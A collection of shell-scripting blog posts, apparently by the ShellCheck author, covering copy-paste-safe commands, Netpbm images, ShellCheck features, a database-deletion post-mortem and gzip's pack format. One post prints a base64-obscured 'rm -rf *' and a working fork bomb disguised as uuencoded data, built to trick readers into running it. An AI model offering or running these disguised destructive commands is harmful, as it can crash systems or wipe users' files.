${var?} and &&: Two simple tips for shell commands in tech docs

tl;dr: Use error-if-unset ${placeholders?} and join commands with && to make it easier and safer to copy-paste shell commands from technical documentation.

I frequently read documentation that includes shell commands, and copy-paste them into a shell. It might look something like this:

To install a JDK:

sudo apt-get update
sudo apt-get install openjdk-<VERSION>-jdk

Obviously this example is particularly simple and clear. A more realistic case might have several 160+ character commands invoking unfamiliar tools and utility scripts with a variety of fixed and variable parameters. To see far too many instances of this, check out your company’s internal wiki.

You, as the documentation author or editor, can improve such command listings in two simple ways.

Use ${NAME?} instead of ad-hoc placeholders like <NAME> or NAME

If I accidentally miss one of the placeholders where I was supposed to insert something, this error-if-unset, POSIX-compatible syntax will cause the command to fail fast with a simple and clear error message:

$ sudo apt-get install openjdk-${VERSION?}-jdk
bash: VERSION: parameter not set

(Assuming there is no existing environment variable by the same name, that is!)
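The same POSIX expansion also accepts text after the ?, which the shell prints instead of its default message. The following is a minimal sketch of that form; the helper name install_cmd and the wording of the hint are made up for illustration, and the command is only printed, never run:

```shell
# Hypothetical helper for this sketch: the body runs in a subshell, so a
# failed expansion ends the subshell rather than the shell you are typing in.
install_cmd() (
  printf '%s\n' "sudo apt-get install openjdk-${VERSION?set it to a JDK major version such as 17}-jdk"
)

unset VERSION
install_cmd || echo "nothing was printed because VERSION was not set"

VERSION=17
install_cmd   # prints: sudo apt-get install openjdk-17-jdk
```

A short hint like this can tell the reader what kind of value the placeholder expects, right at the point of failure.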

Compare this to the original angle brackets, which in the best case fail somewhat obtusely:

$ sudo apt-get install openjdk-<VERSION>-jdk
bash: VERSION: No such file or directory

and otherwise, will create/truncate files while giving misleading errors (if I’m lucky enough to get one):

$ sudo apt-get install openjdk-<VERSION>-jdk
E: Unable to locate package openjdk
$ grep VERSION *
grep: invalid option -- 'j'

Here, >-jdk was interpreted as a file redirection (just like in echo Hi > foo.txt), and created a file named -jdk that causes otherwise fine commands with globs to fail in unexpected ways (and imagine what would happen with grep <alias name> ~/.bashrc!)
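To see the stray file appear without touching a real package manager, here is a small sketch that reproduces the effect in a throwaway directory. It assumes a file named VERSION happens to exist (so the input redirection succeeds) and uses echo as a stand-in for apt-get:

```shell
demo_dir=$(mktemp -d)
(
  cd "$demo_dir" || exit 1
  touch VERSION                          # lets the "<VERSION" redirection succeed
  echo install openjdk-<VERSION>-jdk     # output is redirected into a file named "-jdk"
)
ls "$demo_dir"           # lists both -jdk and VERSION
cat "$demo_dir/-jdk"     # prints: install openjdk-
```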

For just an uppercase word, it can be hard to tell whether something like ID is part of the command or whether it’s a placeholder. The command will try to execute whether or not I guess correctly.

Use && between consecutive commands

I get not just one but two benefits when you use && to join multiple consecutive commands:

sudo apt-get update &&
sudo apt-get install openjdk-${VERSION?}-jdk

The first and well known one is that each command will only run if the previous ones succeeded. Instead of powering through errors and running commands from an increasingly unknown state, the shell will stop so I can get it back on track and continue correctly.
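A quick way to convince yourself of the stop-on-failure behavior is a sketch like the one below. The run helper is hypothetical: it just records a step name and returns whatever status it is given, standing in for real commands:

```shell
ran=""
# Hypothetical helper: remember that a step ran, then return the given status.
run() {
  ran="$ran$1 "
  return "$2"
}

run update 1 &&     # pretend "update" failed
run install 0       # never reached, because the previous step failed

echo "steps run: $ran"   # prints: steps run: update
```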

The second and more subtle benefit is that this will make the shell read all commands up front, before it starts executing any. This matters when any of the commands request input. Here’s what happens when I paste the original example:

$ sudo apt-get update
[sudo] password for vidar:
Sorry, try again.
[sudo] password for vidar:

I pasted two commands, but the first one requested a password. The second command was then read as that password, leading to the "Sorry, try again" error.

When I now enter my actual password, only the first command will run. I won’t have any further indication that one of the commands has been swallowed up.

Compare this to using &&, where the shell patiently reads all of the commands beforehand (with a continuation prompt >), and only then executes them:

$ sudo apt-get update &&
> sudo apt-get install openjdk-14-jdk
[sudo] password for vidar:

When I enter my password now, both commands will run as expected.

Conclusion

These simple tips, alone or together, can help make it easier for users to follow instructions involving shell commands, leading to fewer and more easily fixed mistakes. This makes their lives easier, and by extension, yours.

Use echo/printf to write images in 5 LoC with zero libraries or headers

tl;dr: With the Netpbm file formats, it’s trivial to output pixels using nothing but text based IO

To show that there’s nothing up my sleeves, here’s an image:

[Image: a computer generated image of gently shaded, repeating squares]

And here’s the complete, dependency free bash script that generates it:

#!/bin/bash
exec > my_image.ppm    # All echo statements will write here
echo "P3 250 250 255"  # magic, width, height, max component value
for ((y=0; y<250; y++)) {
  for ((x=0; x<250; x++)) {
    echo "$((x^y)) $((x^y)) $((x|y))" # r, g, b
  }
}

That’s it. That’s all you need to generate an image that can be read by common tools like GIMP, ImageMagick and Netpbm.

To rewind for a second, it’s sometimes useful to output an image to do printf debugging of 2D algorithms, to visualize data, or simply because you have some procedural pixels you want to put on screen.

However — at least if you hadn’t seen the above example — the threshold to start outputting graphics could seem rather high. Even with a single file library, that’s one more thing to set up and figure out. This is especially annoying during debugging, when you know you’re going to delete it within the hour.

Fortunately, the Netpbm suite of tools has developed an amazingly flexible solution: a set of lowest common denominator file formats for full color Portable PixMaps (PPM), Portable GrayMaps (PGM), and monochrome Portable BitMaps (PBM), that can all be written as plain ASCII text using any language’s basic text IO.

Collectively, the formats are known as PNM: Portable aNyMaps.

The above bash script is more than enough to get started, but a detailed description of the file format with examples can be found in man ppm, man pgm, and man pbm on a system with Netpbm installed.

Each man page describes two versions of a simple file format: one binary and one ASCII. Either is completely trivial to implement, though the ASCII ones are my favorite for being so ridiculously barebones that you can write them by hand in Notepad.
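As a rough illustration of how barebones the ASCII variants are, here is a sketch that writes a monochrome bitmap by hand and generates a tiny grayscale strip. The file names plus.pbm and gradient.pgm are arbitrary; the P1 and P2 magic numbers are the plain PBM and PGM counterparts of the P3 used above:

```shell
# Plain PBM: magic "P1", then width and height, then one 0/1 value per
# pixel, where 1 is black.
cat > plus.pbm <<'EOF'
P1
5 5
0 0 1 0 0
0 0 1 0 0
1 1 1 1 1
0 0 1 0 0
0 0 1 0 0
EOF

# Plain PGM: magic "P2", width, height, max gray value, then one value
# per pixel. This is a 16x1 strip fading from black (0) to white (15).
{
  echo "P2 16 1 15"
  i=0
  while [ "$i" -lt 16 ]; do
    echo "$i"
    i=$((i + 1))
  done
} > gradient.pgm
```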

To convert them to more common file formats, open and export them in GIMP, use ImageMagick’s convert my_file.ppm my_file.png, or use Netpbm’s pnmtopng < my_file.ppm > my_file.png

Should you wish to input images using this trivial ASCII format, the Netpbm tool pnmtoplainpnm will convert a binary ppm/pgm/pbm (as produced by any tool including Netpbm’s anytopnm) into an ASCII ppm/pgm/pbm.

If your goal is to experiment with any kind of image processing algorithm, you can easily slot into Netpbm’s wonderfully Unix-y set of tools by reading/writing PPM on stdin/stdout:

curl http://example.com/input.png | 
    pngtopnm | 
    ppmbrighten -v +10 |
    yourtoolhere |
    pnmscale 2 |
    pnmtopng > output.png
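For a sense of how little code a yourtoolhere stage can need, here is a sketch of a filter that inverts the colors of an ASCII PPM. The name invert_ppm is made up, and the sketch assumes plain P3 input with no # comment lines, so binary output from other tools would first have to pass through pnmtoplainpnm:

```shell
# Hypothetical filter: read a plain (P3) PPM on stdin and write an
# inverted copy to stdout, one token per line.
invert_ppm() {
  awk '{
    for (i = 1; i <= NF; i++) {
      n++
      if (n <= 4) {
        # The first four tokens are the header: magic, width, height, max value.
        if (n == 4) max = $i
        print $i
      } else {
        # Every later token is a color sample; flip it around the max value.
        print max - $i
      }
    }
  }'
}

# A single pixel (10, 20, 30) comes out as (245, 235, 225).
printf 'P3 1 1 255\n10 20 30\n' | invert_ppm
```

With Netpbm installed, it could slot into a pipeline as pngtopnm < in.png | pnmtoplainpnm | invert_ppm | pnmtopng > out.png.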

What’s new in ShellCheck v0.7.0?

ShellCheck v0.7.0 has just been released. In addition to the usual “bug fixes and improvements”, there is a set of new features:

Autofixes

A few select warnings now come with auto-fixes. In the most straight-forward case, ShellCheck shows you what it thinks the line ought to be:

In foo line 2:
echo "File size: $(stat -c %s $1)"
                              ^-- SC2086: Double quote to prevent globbing and word splitting.

Did you mean:
echo "File size: $(stat -c %s "$1")"

To actually apply the fixes, you can use ShellCheck’s new diff output format, which outputs standard Unified Diffs that can be piped into tools like git apply and patch:

$ shellcheck -f diff foo
--- a/foo
+++ b/foo
@@ -1,2 +1,2 @@
 #!/bin/sh
-echo "File size: $(stat -c %s $1)"
+echo "File size: $(stat -c %s "$1")"

For example, to apply only SC2086 fixes to all .sh files in a project:

$ shellcheck --include=SC2086 -f diff **/*.sh | git apply

Optional Checks

ShellCheck now includes a small handful of checks that are off by default. These are intended for subjective issues that a project may choose to enforce:

$ cat foo
#!/bin/sh
# shellcheck enable=require-variable-braces
name=World
echo "Hello $name"

$ shellcheck foo
In foo line 4:
echo "Hello $name"
            ^---^ SC2250: Prefer putting braces around variable references even when not strictly required.

Did you mean:
echo "Hello ${name}"

For a list of such checks, run shellcheck --list-optional

Source paths

ShellCheck now allows you to specify a list of search locations for sourced scripts using a # shellcheck source-path=/my/dir directive or --source-path flag.

This is useful in several cases:

  • If all the project’s sourced files are relative to the same directory, you can now specify this directory once instead of having to add source directives everywhere.
  • The special name SCRIPTDIR can be specified in a path to refer to the location of the script being checked, allowing ShellCheck to more conveniently discover included files from the same directory. This also works for any path relative to the script’s directory, such as SCRIPTDIR/../include/
  • Absolute paths are also grounded in the source path, so by specifying source-path=/mnt/chroot, shellcheck will look for . /bin/funcs.sh in /mnt/chroot/bin/funcs.sh. This is useful when targeting a specific system, such as an embedded one.

RC files

Rather than adding directives in each file, you can now set most of the options above in a .shellcheckrc file in the project’s root directory (or your home directory). This allows you to easily apply the same options to all scripts on a per-project/directory basis.
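As a sketch of what such a file might contain, the snippet below writes a small .shellcheckrc that combines two of the options described above. The directory name myproject is a placeholder for your project’s root, and the choice of options is only an example:

```shell
# "myproject" is a placeholder for your project's root directory.
mkdir -p myproject &&
cat > myproject/.shellcheckrc <<'EOF'
# Look for sourced files relative to the script being checked
source-path=SCRIPTDIR

# Turn on an optional check for the whole project
enable=require-variable-braces
EOF
```

The keys use the same names as the corresponding directives, just without the "# shellcheck" prefix.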

Bats and shflags support

ShellCheck no longer needs any preprocessing to check Bats scripts:

$ cat test.bats
#!/usr/bin/env bats

@test "addition using bc" {
  result="$(echo 2+2 | bc)"
  [ "$result" -eq 4 ]
}

$ shellcheck test.bats && echo "Success"
Success

A bats shebang will be interpreted as “bash”, and @test statements will be correctly parsed.

ShellCheck now also recognizes DEFINE_* statements from the shflags library:

DEFINE_string 'name' 'world' 'name to say hello to' 'n'
              ^----^ SC2034: FLAGS_name appears unused. Verify use (or export if used externally).

For a more extensive list of changes, check out the ChangeLog.

Happy ShellChecking!

Tricking the tricksters with a next level fork bomb

Do not copy-paste anything from this article into your shell. You have been warned.

Some people make a cruel sport out of tricking newbies into running destructive shell commands.

Often, this takes the form of crudely obscured commands like this one, which will result in a rm -rf * being executed in the current directory, deleting everything:

$(echo cm0gLXJmICoK | base64 -d)

Years ago, I came across someone doing this, and decided to trick them back.

Now, I’m not enough of a jerk to trick anyone into deleting their files, but I’m more than willing to let wanna-be hackers fork bomb themselves.

I designed a fork bomb in such a way that even when people know it’s a destructive command, they still run it! At the risk of you doing the same, here it is:

eval $(echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode)

It looks like yet another crudely obscured command, but it’s not. It does not prey on unsuspecting newbies’ tendencies to run commands they don’t understand.

Instead, it targets people who are familiar with that kind of trick, who know it’s going to be destructive, and exploits their schadenfreude and curiosity.

For the previous command, such a person would remove the surrounding $(..) to find out what a victim would have been fooled into executing:

$ echo cm0gLXJmICoK | base64 -d
rm -rf *

But when they similarly modify this command to see what horror will befall the newbie stupid enough to run it:

echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode

They’ll suddenly find their system slowing to a crawl until a forced reboot! As it turns out, they were the newbie all along.

You see, the eval (…dramatic pause…) was a decoy!

In fact, the uudecode, echo and $(..) were all just part of the act. They’re purely for misdirection, and don’t serve any functional purpose.

No decoding, execution or evaluation is required for the bomb to explode. Instead it’s set off by the simple expansion, in any context, of this argument:

"I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;=="

Even most of this string is just for show, designed to make it look more like uuencoded data. Here it is with all the arbitrary characters replaced with underscores:

"____________`_____&r()(____&r{,______}&r{,_____});r`_________"

And here it’s written more cleanly:

" `r() ( r & r ); r` "

Now it’s your bog standard fork bomb in a command expansion.


I went through a few iterations designing this trap. The first one was this:

eval $(echo 'a2Vrf3xvcml'\ZW%3t`r()(r|r);r`2'6a2VrZQo=' | base64 -d)

It has the same basic form, but several problems:

  • Base64 is pretty well known, and this clearly isn’t it
  • It’s quite obvious from the quotes that the literal string stops and starts
  • The fork bomb, r()(r|r);r really sticks out

base64 is almost entirely alphanumeric, e.g. bW9yZSBnYXJiYWdlIGhlcmUK, while uuencoded data (if you can even remember what it looks like), has a bunch of symbols that would obscure any embedded shell code: 1<V]M92!G87)B86=E(&AE<F4`. I broke up the long gibberish base64-ish strings with symbols to match.

For the quotes, I shoved it in simple double quotes and hoped no one would notice the amount of questionable characters put in an interpolated string.

For the bomb itself, I wanted to find a way to insert more gibberish, but without adding any spaces that attract the eyes. Making the string r longer would work, but the repetition would be noticeable.

The fix I ended up with was using brace expansion: foo.{jpg,png} expands to foo.jpg foo.png, and r{,foo} expands to r foo. This invokes r with an argument that the function ignores.
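The brace expansion trick on its own is harmless and easy to try. In this sketch, r is replaced by a stand-in function that only reports its argument count, and everything runs in a separate bash process since brace expansion is not part of POSIX sh:

```shell
demo=$(bash -c '
  # Harmless stand-in for the function in the article: it only reports
  # how many arguments it received.
  r() { echo "r was called with $# ignored argument(s)"; }
  echo foo.{jpg,png}
  r{,3Rl7Ig}
')
printf '%s\n' "$demo"
# prints:
#   foo.jpg foo.png
#   r was called with 1 ignored argument(s)
```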

The second version was this:

eval $(echo "I<RA('1E<W3t`p&r()(rofl&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode)

The idea here was that rofl would be executed on every fork, filling the screen with “rofl: command not found” for some extra finesse, but I figured that such a recognizable word would attract attention and further scrutiny.

In the end, I arrived at the final version, and it was quite effective. Several people involved in the noob sniping sheepishly admitted that they fell for it.

I essentially forgot about it, but other people apparently didn’t. About a year later someone asked about it on SuperUser, where you can find an even better analysis.

And now you have the backstory as well.

A shell script that deleted a database, and how ShellCheck could have helped

Summary: We examine a real world case of how an innocent shell scripting mistake caused the deletion of a production database, and how ShellCheck (a GPLv3 shell script linting and analysis tool) would have pointed out the errors and prevented the disaster.

Disclosure: I am the ShellCheck author.

The event

Here is the sad case, taken from a recent StackOverflow post:

My developer committed a huge mistake and we cannot find our mongo database anyone in the server. Rescue please!!!

He logged into the server, and saved the following shell under ~/crontab/mongod_back.sh:

#!/bin/sh
DUMP=mongodump
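OUT_DIR=/data/backup/mongod/tmp     // temporary directory for backup files
TAR_DIR=/data/backup/mongod         // final directory for backup files
DATE=`date +%Y_%m_%d_%H_%M_%S`      // backups are saved under the backup time
DB_USER=Guitang                     // database operator
DB_PASS=qq____________              // database operator password
DAYS=14                             // keep the latest 14 days of backups
TAR_BAK="mongod_bak_$DATE.tar.gz"   // backup file naming format
cd $OUT_DIR                         // create the folder
rm -rf $OUT_DIR/*                   // empty the temporary directory
mkdir -p $OUT_DIR/$DATE             // create the folder for this backup
$DUMP -d wecard -u $DB_USER -p $DB_PASS -o $OUT_DIR/$DATE  // run the backup command
tar -zcvf $TAR_DIR/$TAR_BAK $OUT_DIR/$DATE       // pack the backup files into the final directory
find $TAR_DIR/ -mtime +%DAYS -delete             // delete old backups from more than 14 days ago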

And then he run ./mongod_back.sh, then there were lots of permission denied, then he did Ctrl+C. Then the server shut down automatically.

He then contacted AliCloud, the engineer connected the disk to another working server, so that he could check the disk. Then, he realized that some folders have gone, including /data/ where the mongodb is!!!

PS: he did not take snapshot of the disk before.

Essentially, it’s every engineer’s nightmare.

The post-mortem of this issue is an interesting puzzle that requires only basic shell scripting knowledge. If you’d like to give it a try, now’s the time. If you’d like some hints, here’s shellcheck’s output for the script.

The rest of this post details what happened, and how ShellCheck could have averted the disaster.

What went wrong?

The MCVE for how to ruin your week is this:

#!/bin/sh
DIR=/data/tmp    // The directory to delete
rm -rf $DIR/*    // Now delete it

The fatal error here is that // is not a comment in shell scripts. It’s a path to the root directory, equivalent to /.

On some platforms, the rm line would have been fatal by itself, because it’d boil down to rm -rf / with a few other arguments. Implementations these days often don’t allow this though. The disaster in question happened on Ubuntu, whose GNU rm would have refused:

$ rm -rf //
rm: it is dangerous to operate recursively on '//' (same as '/')
rm: use --no-preserve-root to override this failsafe

This is where the assignment comes in.

The shell treats variable assignments and commands as two sides of the same coin. Here’s the description from POSIX:

A “simple command” is a sequence of optional variable assignments and redirections, in any sequence, optionally followed by words and redirections, terminated by a control operator.

(A “simple command” is in contrast to a “compound command”, a structure like an if statement or a for loop that contains one or more simple or compound commands.)

This means that var=42 and echo "Hello" are both simple commands. The former has one optional assignment and zero optional words. The latter has zero optional assignments and two optional words.

It also implies that a single simple command can contain both: var=42 echo "Hello"

To make a long spec short, assignments in a simple command will apply only to the invoked command name. If there is no command name, they apply to the current shell. The latter explains var=42 by itself, but when would you use the former?

It’s useful when you want to set a variable for a single command without affecting the rest of your shell:

$ echo "$PAGER"  # Show current pager
less

$ PAGER="head -n 5" man ascii
ASCII(7)       Linux Programmer's Manual      ASCII(7)

NAME
       ascii  -  ASCII character set encoded in octal,
       decimal, and hexadecimal

$ echo "$PAGER"  # Current pager hasn't changed
less

This is exactly what happened unintentionally in the fatal assignment. Just like how the previous example scoped PAGER to man only, this one scoped DIR to //:

$ DIR=/data/tmp    // The directory to delete
bash: //: Is a directory

$ echo "$DIR"  # The variable is unset
(no output)

This meant that rm -rf $DIR/* became rm -rf /*, and therefore bypassed the check that is in place for rm -rf /.
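The scoping rule can be reproduced safely without any rm involved. In this sketch, true is a harmless stand-in for the accidental // command, and the two helper variables exist only to capture the state of DIR after each form:

```shell
unset DIR

# Assignment followed by a command name: DIR is set only for that command.
# `true` is a harmless stand-in for the accidental `//` in the script.
DIR=/data/tmp true
after_prefixed=${DIR-unset}

# Assignment with no command name: DIR is set in the current shell.
DIR=/data/tmp
after_plain=${DIR-unset}

echo "after 'DIR=/data/tmp true': $after_prefixed"   # unset
echo "after 'DIR=/data/tmp':      $after_plain"      # /data/tmp
```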

(Why can’t or won’t rm simply refuse to delete /* too? Because it never sees /*: the shell expands it first, so rm sees /bin /boot /dev /data .... While rm could obviously refuse to remove first level directories as well, this starts getting in the way of legitimate usage – a big sin in the Unix philosophy)

How ShellCheck could have helped

Here’s the output from this minimized snippet (see online):

$ shellcheck myscript

In myscript line 2:
DIR=/data/tmp    // The directory to delete
                 ^-- SC1127: Was this intended as a comment? Use # in sh.


In myscript line 3:
rm -rf $DIR/*    // Now delete it
       ^----^ SC2115: Use "${var:?}" to ensure this never expands to /* .
       ^--^ SC2086: Double quote to prevent globbing and word splitting.
                 ^-- SC2114: Warning: deletes a system directory.

Two issues have already been discussed, and would have averted this disaster:

  • ShellCheck noticed that the first // was likely intended as a comment (wiki: SC1127).
  • ShellCheck pointed out that the second // would target a system directory (wiki: SC2114).

The third is a general defensive technique which would also have prevented this catastrophic rm independently of the two other fixes:

  • ShellCheck suggested using rm -rf ${DIR:?}/* to abort execution if the variable for any reason is empty or unset (wiki: SC2115).

This would mitigate the effect of a whole slew of pitfalls that can leave a variable empty, including echo /tmp | read DIR (subshells), DIR= /tmp (bad spacing) and DIR=$(echo /tmp) (potential fork/command failures).
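Here is a minimal sketch of that guard in action. The helper safe_target is hypothetical and deliberately only prints the path it would operate on, so nothing is ever deleted:

```shell
# Hypothetical helper: build the path that a cleanup step would target.
# The body runs in a subshell, so a failed ${DIR:?} ends only the subshell.
safe_target() (
  DIR=$1
  printf '%s\n' "${DIR:?refusing to build a path from an empty DIR}/*"
)

safe_target /data/tmp                                # prints: /data/tmp/*
safe_target "" || echo "aborted before anything could be deleted"
```

Note the colon: ${DIR:?} rejects both unset and empty values, while ${DIR?} only rejects unset ones.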

Conclusion

Shell scripts are really convenient, but also have a large number of potential pitfalls. Many issues that would be simple, fail-fast syntax errors in other languages would instead cause a script to misbehave in confusing, annoying, or catastrophic ways. Many examples can be found in the Wooledge Bash Pitfalls list, or ShellCheck’s own gallery of bad code.

Since tooling exists, why not take advantage? Even if (or especially when!) you rarely write shell scripts, you can install shellcheck from your package manager, along with a suitable editor plugin like Flycheck (Emacs) or Syntastic (Vim), and just forget about it.

The next time you’re writing a script, your editor will show warnings and suggestions automatically. Whether or not you want to fix the more pedantic style issues, it may be worth looking at any unexpected errors and warnings. It might just save your database.

An ode to pack: gzip’s forgotten decompressor

The latest 4.13.9 source release of the Linux kernel is 780 MiB, but thanks to xz compression, the download is a much more manageable 96 MiB (an 88% reduction).

Before xz took over as the default compression format on kernel.org in 2013, following the "latest" link would have gotten you a bzip2 compressed file. The tar.bz2 would have been 115 MiB (-85%), but there was no defending the extra 20 MiB after xz caught up in popularity. bzip2 is all but displaced today.

bzip2 became the default in 2003, though it had long been an option over the less efficient gzip. However, since every OS, browser, language core library, phone and IoT lightswitch has built-in support for gzip, a 148 MiB (-81%) tar.gz remains an option even today.

gzip itself started taking over in 1994, before kernel.org, and before the World Wide Web went mainstream. It must have been a particularly easy sell for the fledgeling Linux kernel: it was made, used and endorsed by the mighty GNU project, it was Free Software, free of patent restrictions, and it provided powerful .zip style DEFLATE compression in a Unix friendly package.

Another nice benefit was that gzip could decompress other contemporary formats, thereby replacing contested and proprietary software.

Among the tools it could replace was compress, the de-facto Unix standard at the time. Created based on LZW in 1985, it was hampered by the same patent woes that plagued GIF files. The then-ubiquitous .Z suffix graced the first public Linux releases, but is now recognized only by the most long-bearded enthusiasts. The current release would have been 302 MiB (-61%) with compress.

Another even more obscure tool it could replace was compress’s own predecessor, pack. This rather loosely defined collection of only partially compatible formats is why compress had to use a capital Z in its extension. pack came first, and offered straight Huffman coding with a .z extension.

With pack, our Linux release would have been 548 MiB (-30%). Compared to xz’s 96 MiB, it’s obvious why no one has used it for decades.

Well, guess what: gzip never ended its support! Quoth the man page,

gunzip can currently decompress files created by gzip, zip,
compress, compress -H or pack.

While multiple implementations existed, these were common peculiarities:

  • They could not be used in pipes.
  • They could not represent empty files.
  • They could not compress a file with only one byte value, e.g. "aaaaaa…"
  • They could fail on "large" files. "can’t occur unless [file size] >= [16MB]", a comment said dismissively, from the time when a 10MB hard drive was a luxury few could afford.

These issues stemmed directly from the Huffman coding used. Huffman coding, developed in 1952, is basically an improvement on Morse code, where common characters like "e" get a short code like "011", while uncommon "z" gets a longer one like "111010".

  • Since you have to count the characters to figure out which are common, you can not compress in a single pass in a pipe. Now that memory is cheap, you could mostly get around that by keeping the data in RAM.

  • Empty files and single-valued files hit an edge case: if you only have a single value, the shortest code for it is the empty string. Decompressors that didn’t account for it would get stuck reading 0 bits forever. You can get around it by adding unused dummy symbols to ensure a minimum bit length of 1.

  • A file over 16MB could cause a single character to be so rare that its bit code was 25+ bits long. A decompressor storing the bits to be decoded in a 32bit value (a trick even gzip uses) would be unable to append a new 8bit byte to the buffer without displacing part of the current bit code. You can get around that by using "package merge" length restricted prefix codes over naive Huffman codes.
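The counting pass that rules out pipes is simple to sketch with standard tools. The helper name count_chars is made up, and the sketch assumes a single line of ASCII text; it only performs the frequency count that Huffman coding starts from, not the coding itself:

```shell
# Hypothetical helper: print each distinct character on stdin with its
# number of occurrences, most frequent first.
count_chars() {
  fold -w 1 | sort | uniq -c | sort -rn
}

# For "banana": a occurs 3 times, n twice, b once.
printf 'banana' | count_chars
```

The most frequent characters at the top of this list are the ones that end up with the shortest codes.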

I wrote a Haskell implementation with all these fixes in place: koalaman/pack is available on GitHub.

During development, I found that pack support in gzip had been buggy since 2012 (version 1.6), but no one had noticed in the five years since. I tracked down the problem and I’m happy to say that version 1.9 will again restore full pack support!

Anyways, what could possibly be the point of using pack today?

There is actually one modern use case: code golfing.

This post came about because I was trying to implement the shortest possible program that would output a piece of simple ASCII art. A common trick is variations of a self-extracting shell script:

sed 1d $0|gunzip;exit
<compressed binary data here>

You can use any available compressor, including xz and bzip2, but these were meant for bigger files and have game ruining overheads. Here’s the result of compressing the ASCII art in question:

  • raw: 269 bytes
  • xz: 216 bytes
  • bzip2: 183 bytes
  • gzip: 163 bytes
  • compress: 165 bytes
  • and finally, pack: 148 bytes!

I was able to save 15 bytes by leveraging gzip’s forgotten legacy support. This is huge in a sport where winning entries are bytes apart.

Let’s have a look at this simple file format. Here’s an example pack file header for the word "banana":

1f 1e        -- Two byte magic header
00 00 00 06  -- Original uncompressed length (6 bytes)

Next comes the Huffman tree. Building it is simple to do by hand, but too much for this post. It just needs to be complete, left-aligned, with eof on the right at the deepest level. Here’s the optimal tree for this string:

        /\
       /  a
      /\
     /  \
    /\   n
   b  eof

We start by encoding its depth (3), and the number of leaves on each level. The last level is encoded minus 2, because the lowest level will have between 2 and 257 leaves, while a byte can only store 0-255.

03  -- depth
01  -- level 1 only contains 'a'
01  -- level 2 only contains 'n'
00  -- level 3 contains 'b' and 'eof', -2 as mentioned

Next we encode the ASCII values of the leaves in the order from top to bottom, left to right. We can leave off the EOF (which is why it needs to be in the lower right):

61 6e 62  -- "a", "n", "b"

This is enough for the decompressor to rebuild the tree. Now we go on to encode the actual data.

Starting from the root, the Huffman codes are determined by adding a 0 for every left branch and a 1 for every right branch you have to take to get to your value:

a   -> right = 1
n   -> left+right = 01
b   -> left+left+left = 000
eof -> left+left+right = 001

banana<eof> would therefore be 000 1 01 1 01 1 001, or when grouped as bytes:

16  -- 0001 0110
C8  -- 1100 1   (000 as padding)
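The grouping step can be double-checked mechanically. This sketch uses a hypothetical helper, pack_bits, that pads a string of 0s and 1s with zero bits to a whole number of bytes and prints each byte in hex:

```shell
# Hypothetical helper: turn a string of 0/1 characters into hex bytes.
pack_bits() (
  bits=$1
  # Pad with zero bits up to a whole number of bytes.
  while [ $(( ${#bits} % 8 )) -ne 0 ]; do
    bits="${bits}0"
  done
  out=""
  while [ -n "$bits" ]; do
    value=0
    n=0
    # Consume eight bits, most significant first.
    while [ "$n" -lt 8 ]; do
      rest=${bits#?}
      bit=${bits%"$rest"}
      value=$(( value * 2 + bit ))
      bits=$rest
      n=$(( n + 1 ))
    done
    out="$out$(printf '%02x' "$value") "
  done
  printf '%s\n' "${out% }"
)

# The codes for b a n a n a eof, concatenated:
pack_bits 0001011011001   # prints: 16 c8
```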

And that’s all we need:

$ printf '\x1f\x1e\x00\x00\x00\x06'\
'\x03\x01\x01\x00\x61\x6e\x62\x16\xc8' | gzip -d
banana

Unfortunately, this triggers the gzip bug mentioned earlier, which stems from failing to account for leading zeroes in bit codes. eof and a have the codes 001 and 1, so an oversimplified equality check confuses one for the other, causing gzip to terminate early:

b
gzip: stdin: invalid compressed data--length error

However, if you’re stuck with an affected version, there’s another party trick you can do: the Huffman tree has to be canonical, but it does not have to be optimal!

What would happen if we skipped the count and instead claimed that each ASCII character is equally likely? Why, we’d get a tree of depth 8 where all the leaf nodes are on the deepest level.

It then follows that each 8 bit character will be encoded as 8 bits in the output file, with the bit patterns we choose by ordering the leaves.

Let’s add a header with a dummy length to a file:

$ printf '\x1F\x1E____' > myfile.z

Now let’s append the aforementioned tree structure, 8 levels with all nodes in the last one:

$ printf '\x08\0\0\0\0\0\0\0\xFE' >> myfile.z

And let’s populate the leaf nodes with 255 bytes in an order of our choice:

$ printf "$(printf '\\%o' {0..254})" |
    tr 'A-Za-z' 'N-ZA-Mn-za-m' >> myfile.z

Now we can run the following command, enter some text, and hit Ctrl-D to "decompress" it:

$ cat myfile.z - | gzip -d 2> /dev/null
Jr unir whfg pbaivaprq TMvc gb hafpenzoyr EBG13!
<Ctrl+D>
We have just convinced GZip to unscramble ROT13!

Can you think of any other fun ways to use or abuse gzip’s legacy support? Post a comment.